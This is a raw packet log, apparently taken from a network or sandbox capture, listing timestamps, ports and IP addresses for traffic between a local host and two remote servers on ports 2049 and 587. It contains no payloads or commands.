Jul 22, 2024 17:52:27.939368963 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:27.942907095 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:27.954927921 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:27.980194092 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:27.980715036 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:27.985858917 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.078085899 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.079962015 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.085045099 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.166814089 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.167037010 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.172578096 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.234924078 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.279308081 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.284416914 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284451962 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284472942 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.284501076 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284507036 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.284579039 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284606934 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284635067 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284662008 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.284689903 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.285064936 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.289964914 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.351856947 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.353622913 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.358807087 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.441365957 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.444756031 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.449752092 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.551757097 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.551935911 CEST	49716	587	192.168.2.7	51.195.88.199
Jul 22, 2024 17:52:28.559134960 CEST	587	49716	51.195.88.199	192.168.2.7
Jul 22, 2024 17:52:28.578598022 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.623126984 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.718575954 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.723742008 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723778009 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723819017 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.723829985 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723841906 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.723860025 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723886967 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.723913908 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.723917961 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723948002 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723970890 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.723977089 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.723989964 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724024057 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724035025 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724062920 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724091053 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724092960 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724107981 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724123001 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724148989 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724152088 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724169970 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724184036 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724200010 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724212885 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724262953 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724263906 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724275112 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724292994 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724314928 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724320889 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724344015 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724376917 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.724431992 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.724524975 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.729327917 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.729444027 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.729531050 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.729607105 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730439901 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730469942 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730499029 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730528116 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730530024 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730581045 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730609894 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730619907 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730638027 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730654001 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730670929 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730679989 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730700970 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.730704069 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730722904 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.730751991 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.731082916 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.731143951 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.731192112 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.731220007 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.731323004 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.734957933 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735014915 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735028982 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.735048056 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.735049009 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735079050 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735101938 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.735106945 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735119104 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.735136032 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735147953 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.735184908 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.735285997 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.735388041 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.736079931 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736140013 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736145973 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.736172915 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736201048 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736354113 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736382961 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736412048 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736439943 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736468077 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736514091 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736565113 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736593962 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736622095 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736649990 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736704111 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736732960 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736761093 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736788988 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736840010 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.736869097 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737037897 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737747908 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737778902 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737804890 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737807035 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737833023 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737835884 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737845898 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737865925 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737884998 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737895012 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737915993 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737922907 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737947941 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737951994 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.737966061 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.737982035 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738008976 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738037109 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738065004 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738094091 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738121033 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738148928 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738177061 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738212109 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738240004 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738267899 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738295078 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738328934 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738356113 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738384008 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738411903 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738439083 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738466024 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738493919 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738522053 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738549948 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738576889 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738605022 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738631964 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738684893 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738713026 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738742113 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.738769054 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740192890 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740245104 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740326881 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740355015 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740382910 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740415096 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740442038 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740526915 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740555048 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740607023 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740633965 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740660906 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740691900 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.740720034 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.741192102 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.741314888 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.741565943 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.741767883 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.741837025 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.743985891 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.743999958 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744024038 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744038105 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744076014 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744118929 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744132042 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744144917 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744168043 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744180918 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744193077 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744209051 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744223118 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744246960 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744261980 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744275093 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744338989 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744353056 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744404078 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744416952 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744430065 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744442940 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744532108 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744544983 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744558096 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744570971 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744582891 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744596004 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744646072 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744658947 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744671106 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744683981 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744697094 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744709015 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744720936 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744771957 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744786024 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744801044 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744812965 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744827032 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744838953 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744851112 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744863987 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744875908 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.744996071 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745008945 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745023012 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745034933 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745048046 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745062113 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745074034 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745086908 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745099068 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745110989 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.745285034 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.745352983 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.747884035 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747898102 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747910976 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747922897 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747936010 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747947931 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747960091 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747972965 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747984886 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.747998953 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748011112 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748023987 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748037100 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748049021 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748061895 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748075008 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748097897 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748111010 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748122931 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748136044 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748147964 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748162031 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748176098 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748188019 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748200893 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748214006 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748226881 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748240948 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748254061 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748265982 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748279095 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748292923 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748306036 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748321056 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748334885 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748348951 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748362064 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748374939 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748388052 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748402119 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748434067 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748450994 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748464108 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748476982 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748502970 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748730898 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.748872042 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749227047 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749337912 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749459982 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749473095 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749584913 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749598026 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749674082 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.749826908 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.749900103 CEST	49707	2049	192.168.2.7	212.162.149.48
Jul 22, 2024 17:52:28.750251055 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750264883 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750313997 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750327110 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750339031 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750365019 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750376940 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750389099 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750405073 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750416994 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750449896 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750463009 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750485897 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750499010 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750511885 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750529051 CEST	2049	49707	212.162.149.48	192.168.2.7
Jul 22, 2024 17:52:28.750552893 CEST	2049	49707	212.162.149.48	192.168.2.7
